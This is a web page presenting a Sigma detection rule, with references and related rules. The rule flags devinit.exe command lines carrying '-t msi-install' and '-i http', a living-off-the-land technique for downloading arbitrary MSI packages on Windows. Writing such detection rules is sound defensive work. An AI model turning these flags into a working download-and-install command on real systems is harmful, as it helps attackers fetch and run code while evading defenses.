Arbitrary MSI Download Via Devinit.EXE
Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
Sigma rule (View on GitHub)
1title: Arbitrary MSI Download Via Devinit.EXE
2id: 90d50722-0483-4065-8e35-57efaadd354d
3status: test
4description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
5references:
6 - https://twitter.com/mrd0x/status/1460815932402679809
7 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/
8author: Florian Roth (Nextron Systems)
9date: 2022-01-11
10modified: 2023-04-06
11tags:
12 - attack.execution
13 - attack.defense-evasion
14 - attack.t1218
15logsource:
16 category: process_creation
17 product: windows
18detection:
19 selection:
20 CommandLine|contains|all:
21 - ' -t msi-install '
22 - ' -i http'
23 condition: selection
24falsepositives:
25 - Unknown
26level: medium
References
-
Devinit.exe is a living-of-the-land file containing unexpected functionality that can be abused by attackers; this page lists all its use cases.
Read More
Related rules
- Arbitrary File Download Via MSOHTMED.EXE
- Arbitrary File Download Via MSPUB.EXE
- Arbitrary File Download Via PresentationHost.EXE
- Created Files by Microsoft Sync Center
- Execute MSDT Via Answer File